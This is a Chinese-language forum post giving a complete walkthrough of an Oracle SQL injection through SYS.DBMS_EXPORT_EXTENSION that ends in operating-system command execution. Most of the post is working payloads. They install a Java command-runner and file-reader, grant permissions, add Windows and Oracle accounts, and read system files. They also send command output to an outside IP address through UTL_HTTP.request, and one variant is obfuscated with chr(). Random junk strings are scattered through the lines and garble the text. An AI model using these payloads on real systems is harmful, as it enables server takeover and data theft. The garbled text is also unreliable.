中国网络渗透测试联盟

标题: 实例演示oracle注入获取cmdshell的全过程 [打印本页]
作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
7 a& I. k( u: X0 R( d
/ p) U8 n% @# _5 S  ^) N% e, D  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
2 {9 ?3 W  W- P" W- z8 J的形式即可。(用" 'a'|| "是为了让语句返回true值) / H/ U6 n' ?- Z# ?
语句有点长,可能要用post提交。
/ S7 x, U  j3 S' e8 L" S以下是各个步骤:
  h6 a: s9 o) O, b, ~* J* D1.创建包 $ @. N6 B4 C4 j2 z. p
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:9 n! T) K$ O) V  b8 C0 A
/xxx.jsp?id=1 and '1'<>'a'||( , f: z5 w% a0 B3 |/ I: v# I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') Z( ]; H) Z/ K5 h3 g
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
4 j2 Y+ v8 b, R, P* W' Ynew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
6 t% y# p  k! }  B0 M. d) i& @}'''';END;'';END;--','SYS',0,'1',0) from dual % G2 ~- G5 E4 j; ?4 w* A
) 5 U5 E) N# s1 q) h. [
------------------------ 0 C, R: o  j# A2 n, I
如果url有长度限制,可以把readFile()函数块去掉,即: ( {6 D4 D2 e, }
/xxx.jsp?id=1 and '1'<>'a'||(
+ r" |5 f. n% H. M1 Tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 G, m, {! u& `( W6 Y' }4 w' L" P
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(9 x% |2 y) c, Z9 p+ Y( g
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
. }: ]9 Y# q3 T% B3 o}'''';END;'';END;--','SYS',0,'1',0) from dual
! u2 `% T5 [- q)
9 R" Q) L8 F, ^6 Y# }同时把后面步骤 提到的 对readFile()的处理语句去掉。 3 ^$ S) U/ |/ o( V( _2 K1 E; I3 p
------------------------------
) \5 ?1 ^( c; {' M2 `5 r2.赋Java权限
5 m/ d# l5 h$ R, Wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
& w1 L, x6 M/ B2 e! Q5 n4 Q3.创建函数
, a' d; l% |9 l2 P) L9 _: pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 a5 Y) J. u; z6 d; P. ^
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
! c; `( q) b3 ^9 j; e; K- Lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: m5 D8 D5 o) U% ]create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
" i: d; s4 ^1 I8 |4.赋public执行函数的权限
5 P8 ~) G4 p1 }. }! O6 V2 f' V9 Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual& [/ y6 ]' w( }: }  n
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5 O3 K: s% f6 R& z& h5.测试上面的几步是否成功 + c5 i. G+ ]6 v( B- O
and '1'<>'11'||( " Q  v2 R# j6 q9 ~5 E3 C3 K& {( R
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
/ Y% |* \9 o7 J* l8 l+ [2 p) / F5 U9 w* p, S
and '1'<>( - w( _) f. F: g
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
) ^: ~5 U4 k  Q3 f" x* f3 q3 p8 I)
6 b1 Z4 n, a, w  s4 O6.执行命令:
. l  @6 E  M9 B/ T) @# A/xxx.jsp?id=1 and '1'<>(
# J  ^& k; M5 Q0 X8 z6 u# y0 Y) zselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual
& w$ U+ W. T% I! f  j
, ?6 E' h! B5 X- c$ s. w)
/ M* J* K0 B8 ]7 K6 W4 J9 q- C/xxx.jsp?id=1 and '1'<>( # j; s) J# W5 J  J6 N  v4 a0 r
select  sys.LinxReadFile('c:/boot.ini') from dual
, }- h1 F" f4 D7 X: K$ A( ?6 ?: p% s% ^' ^
), c7 a+ I+ [! z+ Z" n/ a! \* E2 k
  ! K1 u9 Q9 {; ?3 a: O: `) l/ r
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 5 f. h6 s1 D  @1 s
如果要查看运行结果可以用 union : 4 m- r( M- K1 Y! j9 K
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual9 q4 O3 P7 X2 b' b9 {! A" m
或者UTL_HTTP.request(:
+ Y* L. H! [; F1 A0 b( {/xxx.jsp?id=1 and '1'<>(
! ~- ], l  A: f0 XSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual2 ^  r, y+ k3 Y: u3 u) \8 A# X% h
)
# d$ Z- \  D% Y/ V4 g/xxx.jsp?id=1 and '1'<>( , b1 v  g% o, W: L" v
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual7 i# w9 Q  c6 ]6 r
) * Y  Y/ ?+ x7 n* F  j
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。( J3 D' H5 W) y7 h9 ?% s. a) t
-------------------- 1 ^' b- p& x* L5 N  |5 {# n2 h
6.内部变化 $ v) Q  q! {$ i- P. T6 S  h
通过以下命令可以查看all_objects表达改变:
9 X* F9 T) h: o3 }* I& Pselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
$ ]3 q( {4 n+ |  O2 O$ `7.删除我们创建的函数 & U/ L5 F8 p; Y  _
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* R# N6 j/ r+ Q
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 5 t& n/ D6 H! l0 z/ c  z" p, S( i
====================================================
$ {6 B9 y' m4 z( o, B2 v0 h; p7 W全文结束。谨以此文赠与我的朋友。 ) t. \1 x1 m. a' s
linx   U6 Z# s! q; V# ]6 I
124829445   ?% F2 o4 ?, E/ W
2008.1.12
$ k" L! a/ U' L7 C( r( E+ Klinyujian@bjfu.edu.cn
/ i! g9 ]9 @- ^* o9 x======================================================================
/ v8 L, V9 s+ {3 O# D! I测试漏洞的另一方法:
4 U" K( d& F2 ?. t  r3 g* M& c1 P创建oracle帐号:
; {) v. ^2 ?( vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 e* m4 K% I* a. S' D! a" SCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
: h6 q: y* y( z: y. e即:
, l# ]5 N5 b% E; O! Yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
4 c. d, [5 a6 Ichr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 7 p9 N0 s9 ]+ n4 V4 I2 v
确定漏洞存在: 8 F$ I. A$ ^) M$ C8 e
1<>(
& R! x# W3 J0 ^9 m2 e# ?select user_id from all_users where username='LINXSQL' 2 }9 {: Y( T' m
)
1 ~% d$ f: n3 _1 Y3 O' J- G给linxsql连接权限:
8 i, b% T9 m2 ?2 i+ G% ]) }/ Pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# m2 M+ B3 g% i. q# i% r6 ]% o; hGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
, E3 T& |0 e3 x8 k删除帐号:
& c4 L1 _0 W. P) e4 d2 {3 ^5 \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; j+ U! q+ L+ ~' e5 Sdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
7 n! c, V) G0 a9 g  ^5 Y======================
& \: J) g# @  W, A' N# e3 H. V8 E' s以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
  L5 a5 u7 V  o( d5 f; j1.jsp?id=1 and '1'<>(
2 T3 l2 T+ A8 I  A& E3 }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 V( |0 A8 Q  {. p
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
+ ]" Y) s* L- P0 B, r/ Q4 H) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
" }4 ~1 S, _$ u, M )9 `- H; C2 ^/ L$ S

1 `" ]+ I" W5 i8 r
/ u3 q; @! x' o: f( }  i, V  q* S( j' {




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2